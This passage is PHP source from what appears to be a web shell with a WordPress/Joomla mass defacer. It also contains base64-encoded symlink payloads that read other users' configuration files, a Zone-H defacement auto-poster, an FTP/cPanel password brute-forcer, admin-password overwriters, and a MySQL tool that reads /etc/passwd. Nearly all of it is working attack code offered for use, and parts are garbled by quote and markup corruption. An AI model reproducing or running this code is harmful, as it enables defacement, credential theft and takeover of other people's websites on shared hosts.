“;}global $base_path;unlink($base_path.$co);return array(‘cond’=>$cond, ‘output’=>$output); }function exec_mode_1($def_url) {@mkdir(‘sym’,0777);$wr = “Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any”;$fp = @fopen (‘sym/.htaccess’,’w’);fwrite($fp, $wr);@symlink(‘/’,’sym/root’);$dominios = @file_get_contents(“/etc/named.conf”);@preg_match_all(‘/.*?zone “(.*?)” {/’, $dominios, $out);$out[1] = array_unique($out[1]);$numero_dominios = count($out[1]);echo “Total domains: $numero_dominios

“;$def = file_get_contents($def_url);$def = urlencode($def);$dd = ‘PD9waHANCiRkZWYgPSBmaWxlX2dldF9jb250ZW50cygnaHR0cDovL3pvbmVobWlycm9ycy5vcmcvZGVmYWNlZC8yMDEzLzAzLzE5L2Fzc29jaWFwcmVzcy5uZXQnKTsNCiRwID0gZXhwbG9kZSgncHVibGljX2h0bWwnLGRpcm5hbWUoX19GSUxFX18pKTsNCiRwID0gJHBbMF0uJ3B1YmxpY19odG1sJzsNCmlmICgkaGFuZGxlID0gb3BlbmRpcigkcCkpIHsNCiAgICAkZnAxID0gQGZvcGVuKCRwLicvaW5kZXguaHRtbCcsJ3crJyk7DQogICAgQGZ3cml0ZSgkZnAxLCAkZGVmKTsNCiAgICAkZnAxID0gQGZvcGVuKCRwLicvaW5kZXgucGhwJywndysnKTsNCiAgICBAZndyaXRlKCRmcDEsICRkZWYpOw0KICAgICRmcDEgPSBAZm9wZW4oJHAuJy9pbmRleC5odG0nLCd3KycpOw0KICAgIEBmd3JpdGUoJGZwMSwgJGRlZik7DQogICAgZWNobyAnRG9uZSc7DQp9DQpjbG9zZWRpcigkaGFuZGxlKTsNCnVubGluayhfX0ZJTEVfXyk7DQo/Pg==’;$base_url = ‘http://’.$_SERVER[‘SERVER_NAME’].dirname($_SERVER[‘SCRIPT_NAME’]).’/sym/root/home/’;$output = fopen(‘defaced.html’, ‘a+’);$_SESSION[‘count1’] = (isset($_GET[‘st’]) && $_GET[‘st’]!=”) ? (isset($_SESSION[‘count1’]) ? $_SESSION[‘count1’] :0 ) : 0;$_SESSION[‘count2’] = (isset($_GET[‘st’]) && $_GET[‘st’]!=”) ? (isset($_SESSION[‘count2’]) ? $_SESSION[‘count2’] :0 ) : 0;echo ”;$j = 1;$st = (isset($_GET[‘st’]) && $_GET[‘st’]!=”) ? $_GET[‘st’] : 0;for($i = $st; $i <= $numero_dominios; $i++){$domain = $out[1][$i];$dono_arquivo = @fileowner(“/etc/valiases/”.$domain);$infos = @posix_getpwuid($dono_arquivo);if($infos[‘name’]!=’root’) {$config01 = @file_get_contents($base_url.$infos[‘name’].”/public_html/configuration.php”);$config02 = @file_get_contents($base_url.$infos[‘name’].”/public_html/wp-config.php”);$config03 = @file_get_contents($base_url.$infos[‘name’].”/public_html/blog/wp-config.php”);$cls = ($j % 2 == 0) ? ‘class=”even”‘ : ‘class=”odd”‘;if($config01 && preg_match(‘/dbprefix/i’,$config01)){echo ”;echo ”;$res = index_changer_joomla($config01, $def, $domain);echo ”;if($res[‘cond’]) {echo ”;fwrite($output, ‘http://’.$domain.”
“);$_SESSION[‘count1’] = $_SESSION[‘count1’] + 1;} else {echo ”;}echo ”;}if($config02 && preg_match(‘/DB_NAME/i’,$config02)){echo ”;echo ”;$res = index_changer_wp($config02, $dd);echo ”;if($res[‘cond’]) {echo ”;fwrite($output, ‘http://’.$domain.”
“);$_SESSION[‘count2’] = $_SESSION[‘count2’] + 1;} else {echo ”;}echo ”;}$cls = ($j % 2 == 0) ? ‘class=”even”‘ : ‘class=”odd”‘;if($config03 && preg_match(‘/DB_NAME/i’,$config03)){echo ”;echo ”;$res = index_changer_wp($config03, $dd);echo ”;if($res[‘cond’]) {echo ”;fwrite($output, ‘http://’.$domain.”
“);$_SESSION[‘count2’] = $_SESSION[‘count2’] + 1;} else {echo ”;}echo ”;}}}echo ‘

<tr ‘.$cls.’=””>’.($j++).”.$i.’‘.$domain.’JOOMLA‘.$res[‘output’].’DEFACEDFAILED<tr ‘.$cls.’=””>’.($j++).”.$i.’‘.$domain.’WORDPRESS‘.$res[‘output’].’DEFACEDFAILED<tr ‘.$cls.’=””>’.($j++).”.$i.’‘.$domain.’WORDPRESS‘.$res[‘output’].’DEFACEDFAILED

ID SID Domain Type Action Status

‘;echo ‘

‘;echo ‘Total Defaced = ‘.($_SESSION[‘count1’]+$_SESSION[‘count2′]).’ (JOOMLA = ‘.$_SESSION[‘count1′].’, WORDPRESS = ‘.$_SESSION[‘count2′].’)
‘;echo ‘View Total Defaced urls
‘;if($_SESSION[‘count1’]+$_SESSION[‘count2’] > 0){echo ‘Send to Zone-H‘;}}function exec_mode_2($def_url) {$domains = @file_get_contents(“/etc/named.conf”);@preg_match_all(‘/.*?zone “(.*?)” {/’, $domains, $out);$out = array_unique($out[1]);$num = count($out);print(“Total domains: $num

“);$def = file_get_contents($def_url);$def = urlencode($def);$output = fopen(‘defaced.html’, ‘a+’);$defaced = ”;$count1 = 0;$count2 = 0;echo ”;$j = 1;$map = array();foreach($out as $d) {$info = @posix_getpwuid(fileowner(“/etc/valiases/”.$d));$map[$info[‘name’]] = $d;}$dt = ‘IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHdkfTs
NCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2
h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19od
G1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwv
YmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRklMRSwgJy9ldGMvcGFzc3d
kJyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPCR5OyRrYSsrKXsNCiAgIC
B3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==’;mkdir(‘plsym’,0777);file_put_contents(‘plsym/plsym.cc’, base64_decode($dt));chmod(‘plsym/plsym.cc’, 0755);$wr = “Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc”;$fp = @fopen (‘plsym/.htaccess’,’w’);fwrite($fp, $wr);fclose($fp);$res = file_get_contents(‘http://’.$_SERVER[‘SERVER_NAME’].dirname($_SERVER[‘SCRIPT_NAME’]).’/plsym/plsym.cc’); $url = ‘http://’.$_SERVER[‘SERVER_NAME’].dirname($_SERVER[‘SCRIPT_NAME’]).’/plsym/’;unlink(‘plsym/plsym.cc’);$data = file_get_contents($url);preg_match_all(‘//’, $data, $match);unset($match[1][0]);$i = 1;foreach($match[1] as $m){$mz = explode(‘##’,urldecode($m));$config01 = ”;$config02 = ”;if($mz[1] == ‘joomla.txt’) {$config01 = file_get_contents($url.$m);}if($mz[1] == ‘wordpress.txt’) {$config02 = file_get_contents($url.$m);}$domain = $map[$mz[0]];$cls = ($j % 2 == 0) ? ‘class=”even”‘ : ‘class=”odd”‘;if($config01 && preg_match(‘/dbprefix/i’,$config01)){echo ‘‘;echo ‘‘;$res = index_changer_joomla($config01, $def, $domain);echo ‘‘;if($res[‘cond’]) {echo ‘‘;fwrite($output, ‘http://’.$domain.”
“);$count1++;} else {echo ‘‘;}echo ‘‘;}if($config02 && preg_match(‘/DB_NAME/i’,$config02)){echo ‘‘;echo ‘‘;$res = index_changer_wp($config02, $def);echo ‘‘;if($res[‘cond’]) {echo ‘‘;fwrite($output, ‘http://’.$domain.”
“);$count2++;} else {echo ‘‘;}echo ‘‘;}}echo ‘

<tr ‘.$cls.’=””>’.($j++).”.$i++.’‘.$domain.’JOOMLA‘.$res[‘output’].’DEFACEDFAILED<tr ‘.$cls.’=””>’.($j++).’‘.$domain.’WORDPRESS‘.$res[‘output’].’DEFACEDFAILED

ID SID Domain Type Action Status

‘;echo ‘

‘;echo ‘Total Defaced = ‘.($count1+$count2).’ (JOOMLA = ‘.$count1.’, WORDPRESS = ‘.$count2.’)
‘;echo ‘View Total Defaced urls
‘;if($count1+$count2 > 0){echo ‘Send to Zone-H‘;}}function exec_mode_3($def_url) {$domains = @file_get_contents(“/etc/named.conf”);@preg_match_all(‘/.*?zone “(.*?)” {/’, $domains, $out);$out = array_unique($out[1]);$num = count($out);print(“Total domains: $num

“);$def = file_get_contents($def_url);$def = urlencode($def); $output = fopen(‘defaced.html’, ‘a+’);$defaced = ”;$count1 = 0;$count2 = 0;echo ”;$j = 1;$map = array();foreach($out as $d) {$info = @posix_getpwuid(fileowner(“/etc/valiases/”.$d));$map[$info[‘name’]] = $d;}$dt = ‘IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHd
kfTsNCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcH
VibGljX2h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL
3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicv
cHVibGljX2h0bWwvYmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRkl
MRSwgJ2RhdGEudHh0Jyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPC
R5OyRrYSsrKXsNCiAgICB3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==’;mkdir(‘plsym’,0777);file_put_contents(‘plsym/data.txt’, $_POST[‘man_data’]);file_put_contents(‘plsym/plsym.cc’, base64_decode($dt));chmod(‘plsym/plsym.cc’, 0755);$wr = “Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc”;$fp = @fopen (‘plsym/.htaccess’,’w’);fwrite($fp, $wr);fclose($fp);$res = file_get_contents(‘http://’.$_SERVER[‘SERVER_NAME’].dirname($_SERVER[‘SCRIPT_NAME’]).’/plsym/plsym.cc’); $url = ‘http://’.$_SERVER[‘SERVER_NAME’].dirname($_SERVER[‘SCRIPT_NAME’]).’/plsym/’;unlink(‘plsym/plsym.cc’);$data = file_get_contents($url);preg_match_all(‘//’, $data, $match);unset($match[1][0]);$i=1;foreach($match[1] as $m){$mz = explode(‘##’,urldecode($m));$config01 = ”;$config02 = ”;if($mz[1] == ‘joomla.txt’) {$config01 = file_get_contents($url.$m);}if($mz[1] == ‘wordpress.txt’) {$config02 = file_get_contents($url.$m);}$domain = $map[$mz[0]];$cls = ($j % 2 == 0) ? ‘class=”even”‘ : ‘class=”odd”‘;if($config01 && preg_match(‘/dbprefix/i’,$config01)){echo ‘‘;echo ‘‘;$res = index_changer_joomla($config01, $def, $domain);echo ‘‘;if($res[‘cond’]) {echo ‘‘;fwrite($output, ‘http://’.$domain.”
“);$count1++;} else {echo ‘‘;}echo ‘‘;}if($config02 && preg_match(‘/DB_NAME/i’,$config02)){echo ‘‘;echo ‘‘;$res = index_changer_wp($config02, $def);echo ‘‘;if($res[‘cond’]) {echo ‘‘;fwrite($output, ‘http://’.$domain.”
“);$count2++;} else {echo ‘‘;}echo ‘‘;}}echo ‘

<tr ‘.$cls.’=””>’.($j++).”.($i++).’‘.$domain.’JOOMLA‘.$res[‘output’].’DEFACEDFAILED<tr ‘.$cls.’=””>’.($j++).’‘.$domain.’WORDPRESS‘.$res[‘output’].’DEFACEDFAILED

ID SID Domain Type Action Status

‘;echo ‘

‘;echo ‘Total Defaced = ‘.($count1+$count2).’ (JOOMLA = ‘.$count1.’, WORDPRESS = ‘.$count2.’)
‘;echo ‘View Total Defaced urls
‘;if($count1+$count2 > 0){echo ‘Send to Zone-H‘;}}echo ‘

WordPress and Joomla Mass Defacer

‘;if(!isset($_POST[‘form_action’]) && !isset($_GET[‘mode’])){echo ‘

using /etc/named.conf (‘.(is_readable(‘/etc/named.conf’)?’READABLE‘:’NOT READABLE‘).’)
using /etc/passwd (‘.(is_readable(‘/etc/passwd’)?’READABLE‘:’NOT READABLE‘).’)
manual copy of /etc/passwd

index url:

‘;}$milaf_el_index = $_POST[‘defpage’];if($_POST[‘form_action’] == 1) {if($_POST[‘mode’]==1) { exec_mode_1($milaf_el_index); }if($_POST[‘mode’]==2) { exec_mode_2($milaf_el_index); }if($_POST[‘mode’]==3) { exec_mode_3($milaf_el_index); }}if($_GET[‘mode’]==1) { exec_mode_1($milaf_el_index); }echo ”;}
elseif(isset($_GET[‘x’]) && ($_GET[‘x’] == ‘zone-h’)){$defacer=’ReZK2LL’;$display_details=0;$method=14;$reason=5;error_reporting(0);set_time_limit(0);if(!function_exists(‘curl_init’)){echo “CURL ERROR\n”;exit;}$cli=(isset($argv[0]))?1:0;if($cli==1){$file=$argv[1];$sites=file($file);}if(function_exists(apache_setenv)){@apache_setenv(‘no-gzip’, 1);}@ini_set(‘zlib.output_compression’, 0);@ini_set(‘implicit_flush’, 1);@ob_implicit_flush(true);@ob_end_flush();if(isset($_POST[‘domains’])){$sites=explode(“\n”,$_POST[‘domains’]);}if (file_exists($_FILES[“file”][“tmp_name”])){$file=$_FILES[“file”][“tmp_name”];$sites=file($file);}
echo <<<eof

 
EOF;
if(!isset($_POST['defacer'])){
echo <<<eof

Zone-H Poster

Defacer :

Domains:

 
OR
Submit form .txt file:

EOF;
}$defacer=$_POST[‘defacer’];if(!$sites){echo ‘

‘;exit;}$sites=array_unique(str_replace(‘http://’,”,$sites));$total=count($sites);echo “[+] Total unique domain: $total\n\n”;$pause=10;$start=time();$main=curl_multi_init();for($m=0;$m<3;$m++){$http[] = curl_init();}for($n=0;$n<$total;$n +=30){if($display_details==1){for($x=0;$x<30;$x++){echo'[+] Adding ‘.rtrim($sites[$n+$x]).”;echo “\n”;}}$d=$n+30;if($d>$total){$d=$total;}echo “=====================>[$d/$total]\n”;for($w=0;$w<3;$w++){$p=$w * 10;if(!(isset($sites[$n+$p]))){$pause=$w;break;}$posts[$w]=”defacer=$defacer&domain1=http%3A%2F%2F”.rtrim($sites[$n+$p]).”&domain2=http%3A%2F%2F”.rtrim($sites[$n+$p+1]).”&domain3=http%3A%2F%2F”.rtrim($sites[$n+$p+2]).”&domain4=http%3A%2F%2F”.rtrim($sites[$n+$p+3]).”&domain5=http%3A%2F%2F”.rtrim($sites[$n+$p+4]).”&domain6=http%3A%2F%2F”.rtrim($sites[$n+$p+5]).”&domain7=http%3A%2F%2F”.rtrim($sites[$n+$p+6]).”&domain8=http%3A%2F%2F”.rtrim($sites[$n+$p+7]).”&domain9=http%3A%2F%2F”.rtrim($sites[$n+$p+8]).”&domain10=http%3A%2F%2F”.rtrim($sites[$n+$p+9]).”&hackmode=”.$method.”&reason=”.$reason.”&submit=Send”;$curlopt=array(CURLOPT_USERAGENT => ‘Mozilla/5.0 (Windows NT 6.1;WOW64) AppleWebKit/535.16 (KHTML, like Gecko) Chrome/18.0.1003.1 Safari/535.16’,CURLOPT_RETURNTRANSFER => true,CURLOPT_FOLLOWLOCATION =>true,CURLOPT_ENCODING => true,CURLOPT_HEADER => false,CURLOPT_HTTPHEADER => array(“Keep-Alive: 7”),CURLOPT_CONNECTTIMEOUT => 3,CURLOPT_URL => ‘http://www.zone-h.com/notify/mass’,CURLOPT_POSTFIELDS => $posts[$w]);curl_setopt_array($http[$w],$curlopt);curl_multi_add_handle($main,$http[$w]);}$running = null;do{curl_multi_exec($main,$running);}while($running > 0);for($m=0;$m<3;$m++){if($pause==$m){break;}curl_multi_remove_handle($main, $http[$m]);$code = curl_getinfo($http[$m], CURLINFO_HTTP_CODE);if ($code != 200) {while(true){echo’ [-]Error!….Retrying’;echo “\n”;sleep(5);curl_exec($http[$m]);$code = curl_getinfo($http[$m], CURLINFO_HTTP_CODE);if( $code== 200){break 1;}}}}}$end= time() – $start;echo ‘Done’;echo “\n\n[*]Time: $end seconds\n”;curl_multi_close($main);if($cli==0){echo ”;}exit;}
elseif(isset($_GET[‘x’]) && ($_GET[‘x’] == ‘brute’)){$connect_timeout=5;
set_time_limit(0);$submit=$_REQUEST[‘submit’];$users=$_REQUEST[‘users’];$pass=$_REQUEST[‘passwords’];$target=$_REQUEST[‘target’];$cracktype=$_REQUEST[‘cracktype’];if($target == “”){$target = “localhost”;}?>

Connection Timed out”;exit;}elseif ( curl_errno($ch) == 0 ){print ”

Username ($user) | Password ($pass)

“;}curl_close($ch);}function cpanel_check($host,$user,$pass,$timeout){$ch = curl_init();curl_setopt($ch, CURLOPT_URL, “http://$host:2082”);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);curl_setopt($ch, CURLOPT_USERPWD, “$user:$pass”);curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);curl_setopt($ch, CURLOPT_FAILONERROR, 1);$data = curl_exec($ch);if ( curl_errno($ch) == 28 ) {print “Connection Timed out“;exit;}elseif ( curl_errno($ch) == 0 ){print ”

[+]Username ($user) | Password ($pass)

“;}curl_close($ch);}if(isset($submit) && !empty($submit)){if(empty($users) && empty($pass)){print “Error : Check The Users and Password List

“;exit;}if(empty($users)){print “Error :Check The Users List

“;exit;}if(empty($pass) ){print “Error :Check The Password List

“;exit;};$userlist=explode(“\n”,$users);$passlist=explode(“\n”,$pass);print “[~] Wait …

“;foreach ($userlist as $user) {$pureuser = trim($user);foreach ($passlist as $password ) {$purepass = trim($password);if($cracktype == “ftp”){ftp_check($target,$pureuser,$purepass,$connect_timeout);}if ($cracktype == “cpanel”){cpanel_check($target,$pureuser,$purepass,$connect_timeout);}}}}
echo ”

The Cracker

IP :

userspasswords

Cpanel(2082)Ftp (21)

“;die();}
elseif(isset($_GET[‘x’]) && ($_GET[‘x’] == ‘joomla’)){if(empty($_POST[‘pwd’])){echo ”

Joomla login changer

DB_Prefix :   host :   database :   username :   password :  

New Username:  

New Password:  

“;}else {$prefix = $_POST[‘prefix’];$localhost = $_POST[‘localhost’];$database = $_POST[‘database’];$username = $_POST[‘username’];$password = $_POST[‘password’];$admin = $_POST[‘admin’];$pd = ($_POST[“pwd”]);$pwd = md5($pd);@mysql_connect($localhost,$username,$password) or die (mysql_error());@mysql_select_db($database) or die (mysql_error());$SQL=@mysql_query(“UPDATE “.$prefix.”users SET username ='”.$admin.”‘ WHERE name = ‘Super User’ or name = ‘Super Utilisateur’ or id=’62′”) or die (mysql_error());$SQL=@mysql_query(“UPDATE “.$prefix.”users SET password ='”.$pwd.”‘ WHERE name = ‘Super User’ or name = ‘Super Utilisateur’ or id=’62′”) or die (mysql_error());if($SQL) echo ”

Done… go and login

“;}}
elseif(isset($_GET[‘x’]) && ($_GET[‘x’] == ‘mysql’)){if(isset($_GET[‘sqlhost’]) && isset($_GET[‘sqluser’]) && isset($_GET[‘sqlpass’]) && isset($_GET[‘sqlport’])){$sqlhost = $_GET[‘sqlhost’];$sqluser = $_GET[‘sqluser’];$sqlpass = $_GET[‘sqlpass’];$sqlport = $_GET[‘sqlport’];if($con = @mysql_connect($sqlhost.”:”.$sqlport,$sqluser,$sqlpass)){$msg .= ”

“;$msg .= “Connected to “.$sqluser.”@“.$sqlhost.”:”.$sqlport;$msg .= ”  ->  [ databases ]“;if(isset($_GET[‘db’])) $msg .= ”  ->  “.htmlspecialchars($_GET[‘db’]).”“;if(isset($_GET[‘table’])) $msg .= ”  ->  “.htmlspecialchars($_GET[‘table’]).”“;$msg .= ”

version : “.mysql_get_server_info($con).” proto “.mysql_get_proto_info($con).”

“;$msg .= “

“;echo $msg;if(isset($_GET[‘db’]) && (!isset($_GET[‘table’])) && (!isset($_GET[‘sqlquery’]))){$db = $_GET[‘db’];$query = “DROP TABLE IF EXISTS b374k_table;\nCREATE TABLE `b374k_table` ( `file` LONGBLOB NOT NULL );\nLOAD DATA INFILE ‘/etc/passwd’\nINTO TABLE b374k_table;SELECT * FROM b374k_table;\nDROP TABLE IF EXISTS b374k_table;”;$msg = ”

“;$tables = array();$msg .= “”;$hasil = @mysql_list_tables($db,$con);
while(list($table) = @mysql_fetch_row($hasil)){@array_push($tables,$table);} @sort($tables);
foreach($tables as $table){$msg .= “”;} $msg .= ”

available tables on “.$db.”
$table

“;}
elseif(isset($_GET[‘table’]) && (!isset($_GET[‘sqlquery’]))){
$db = $_GET[‘db’];$table = $_GET[‘table’];$query = “SELECT * FROM “.$db.”.”.$table.” LIMIT 0,100;”;$msgq = ”

“;$columns = array();$msg = “”;$hasil = @mysql_query(“SHOW FIELDS FROM “.$db.”.”.$table);while(list($column) = @mysql_fetch_row($hasil)){$msg .= “”;$kolum = $column;}$msg .= “”;$hasil = @mysql_query(“SELECT count(*) FROM “.$db.”.”.$table);
list($total) = mysql_fetch_row($hasil);
if(isset($_GET[‘z’])) $page = (int) $_GET[‘z’];
else $page = 1;$pagenum = 100;$totpage = ceil($total / $pagenum);$start = (($page – 1) * $pagenum);$hasil = @mysql_query(“SELECT * FROM “.$db.”.”.$table.” LIMIT “.$start.”,”.$pagenum);
while($datas = @mysql_fetch_assoc($hasil)){$msg .= “”;foreach($datas as $data){if(trim($data) == “”)
$data = ” “;$msg .= “”;}$msg .= “”;} $msg .= ”

$column
$data

“;$head = ”

Page

“;$msg = $msgq.$head.$msg;}
elseif(isset($_GET[‘submitquery’]) && ($_GET[‘sqlquery’] != “”)){$db = $_GET[‘db’];$query = magicboom($_GET[‘sqlquery’]);
$msg = ”

“;@mysql_select_db($db);$querys = explode(“;”,$query);foreach($querys as $query){if(trim($query) != “”){$hasil = mysql_query($query);
if($hasil){$msg .= ”

“.$query.”;   [ ok ]

“;$msg .= “”;
for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= “”;$msg .= “”;for($i=0;$i<@mysql_num_rows($hasil);$i++) {$rows=@mysql_fetch_array($hasil);$msg .= “”;for($j=0;$j<@mysql_num_fields($hasil);$j++) {
if($rows[$j] == “”) $dataz = ” “;
else $dataz = $rows[$j];$msg .= “”;} $msg .= “”;} $msg .= ”

“.htmlspecialchars(@mysql_field_name($hasil,$i)).”
“.$dataz.”

“;}
else $msg .= ”

“.$query.”;   [ error ]

“;} } }
else {$query = “SHOW PROCESSLIST;\nSHOW VARIABLES;\nSHOW STATUS;”;$msg = ”

“;$dbs = array();$msg .= “”;$hasil = @mysql_list_dbs($con);
while(list($db) = @mysql_fetch_row($hasil)){@array_push($dbs,$db);} @sort($dbs);foreach($dbs as $db){
$msg .= “”;} $msg .= ”

available databases
$db

“;}
@mysql_close($con);} else $msg = ”

can’t connect

“;echo $msg;} else{?>

MySQL Connect

Connection Form
  Host
  Username
  Password
  Port  


elseif(isset($_GET[‘x’]) && ($_GET[‘x’] == ‘configs’)) {?>

Configs Grabber

/etc/passwd content

Symlink is disabled 🙁 ‘);}@mkdir(‘configs’, 0755);@chdir(‘configs’);$htaccess=”
Options all
Options +Indexes
Options +FollowSymLinks
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any
“;file_put_contents(“.htaccess”,$htaccess,FILE_APPEND);$passwd=$_POST[“passwd”];$passwd=explode(“\n”,$passwd);echo “
wait …
“;foreach($passwd as $pwd){$pawd=explode(“:”,$pwd);$user =$pawd[0];@symlink(‘/home/’.$user.’/public_html/wp-config.php’,$user.’-wp13.txt’);@symlink(‘/home/’.$user.’/public_html/wp/wp-config.php’,$user.’-wp13-wp.txt’);@symlink(‘/home/’.$user.’/public_html/WP/wp-config.php’,$user.’-wp13-WP.txt’);@symlink(‘/home/’.$user.’/public_html/wp/beta/wp-config.php’,$user.’-wp13-wp-beta.txt’);@symlink(‘/home/’.$user.’/public_html/beta/wp-config.php’,$user.’-wp13-beta.txt’);@symlink(‘/home/’.$user.’/public_html/press/wp-config.php’,$user.’-wp13-press.txt’);@symlink(‘/home/’.$user.’/public_html/wordpress/wp-config.php’,$user.’-wp13-wordpress.txt’);@symlink(‘/home/’.$user.’/public_html/Wordpress/wp-config.php’,$user.’-wp13-Wordpress.txt’);@symlink(‘/home/’.$user.’/public_html/blog/wp-config.php’,$user.’-wp13-Wordpress.txt’);@symlink(‘/home/’.$user.’/public_html/wordpress/beta/wp-config.php’,$user.’-wp13-wordpress-beta.txt’);@symlink(‘/home/’.$user.’/public_html/news/wp-config.php’,$user.’-wp13-news.txt’);@symlink(‘/home/’.$user.’/public_html/new/wp-config.php’,$user.’-wp13-new.txt’);@symlink(‘/home/’.$user.’/public_html/blog/wp-config.php’,$user.’-wp-blog.txt’);@symlink(‘/home/’.$user.’/public_html/beta/wp-config.php’,$user.’-wp-beta.txt’);@symlink(‘/home/’.$user.’/public_html/blogs/wp-config.php’,$user.’-wp-blogs.txt’);@symlink(‘/home/’.$user.’/public_html/home/wp-config.php’,$user.’-wp-home.txt’);@symlink(‘/home/’.$user.’/public_html/protal/wp-config.php’,$user.’-wp-protal.txt’);@symlink(‘/home/’.$user.’/public_html/site/wp-config.php’,$user.’-wp-site.txt’);@symlink(‘/home/’.$user.’/public_html/main/wp-config.php’,$user.’-wp-main.txt’);@symlink(‘/home/’.$user.’/public_html/test/wp-config.php’,$user.’-wp-test.txt’);@symlink(‘/home/’.$user.’/public_html/joomla/configuration.php’,$user.’-joomla2.txt’);@symlink(‘/home/’.$user.’/public_html/protal/configuration.php’,$user.’-joomla-protal.txt’);@symlink(‘/home/’.$user.’/public_html/joo/configuration.php’,$user.’-joo.txt’);@symlink(‘/home/’.$user.’/public_html/cms/configuration.php’,$user.’-joomla-cms.txt’);@symlink(‘/home/’.$user.’/public_html/site/configuration.php’,$user.’-joomla-site.txt’);@symlink(‘/home/’.$user.’/public_html/main/configuration.php’,$user.’-joomla-main.txt’);@symlink(‘/home/’.$user.’/public_html/news/configuration.php’,$user.’-joomla-news.txt’);@symlink(‘/home/’.$user.’/public_html/new/configuration.php’,$user.’-joomla-new.txt’);@symlink(‘/home/’.$user.’/public_html/home/configuration.php’,$user.’-joomla-home.txt’);@symlink(‘/home/’.$user.’/public_html/vb/includes/config.php’,$user.’-vb-config.txt’);@symlink(‘/home/’.$user.’/public_html/whm/configuration.php’,$user.’-whm15.txt’);@symlink(‘/home/’.$user.’/public_html/central/configuration.php’,$user.’-whm-central.txt’);@symlink(‘/home/’.$user.’/public_html/whm/whmcs/configuration.php’,$user.’-whm-whmcs.txt’);@symlink(‘/home/’.$user.’/public_html/whm/WHMCS/configuration.php’,$user.’-whm-WHMCS.txt’);@symlink(‘/home/’.$user.’/public_html/whmc/WHM/configuration.php’,$user.’-whmc-WHM.txt’);@symlink(‘/home/’.$user.’/public_html/whmcs/configuration.php’,$user.’-whmcs.txt’);@symlink(‘/home/’.$user.’/public_html/support/configuration.php’,$user.’-support.txt’);@symlink(‘/home/’.$user.’/public_html/configuration.php’,$user.’-joomla.txt’);@symlink(‘/home/’.$user.’/public_html/submitticket.php’,$user.’-whmcs2.txt’);@symlink(‘/home/’.$user.’/public_html/whm/configuration.php’,$user.’-whm.txt’);}echo ‘Done -> configs‘;}}
elseif(isset($_GET[‘x’]) && ($_GET[‘x’] == ‘config’)){ error_reporting(0);if ($_POST[‘kill’]) {$url = $_POST[‘url’];$user = $_POST[‘user’];$pass =$_POST[‘pass’];$pss = md5($pass);function enter($text,$a,$b){$explode = explode($a,$text);$explode = explode($b,$explode[1]);return $explode[0];}$config = file_get_contents($url);$password = enter($config,”define(‘DB_PASSWORD’, ‘”,”‘);”);$username = enter($config,”define(‘DB_USER’, ‘”,”‘);”);$db = enter($config,”define(‘DB_NAME’, ‘”,”‘);”);$prefix = enter($config,’$table_prefix = \”,”‘;”);$host = enter($config,”define(‘DB_HOST’, ‘”,”‘);”);if($config && preg_match(‘/DB_NAME/i’,$config)){$conn= @mysql_connect($host,$username ,$password ) or die (“i can’t connect to mysql, check your data”);@mysql_select_db($db,$conn) or die (mysql_error());$grab = @mysql_query(“SELECT * from `wp_options` WHERE option_name=’home'”);$data = @mysql_fetch_array($grab);$site_url = $data[“option_value”];$query = mysql_query(“UPDATE `”.$prefix.”users` SET `user_login` = ‘”.$user.”‘,`user_pass` = ‘”.$pss.”‘ WHERE `ID` = 1″);if ($query) {echo ‘

Done !

site user password link
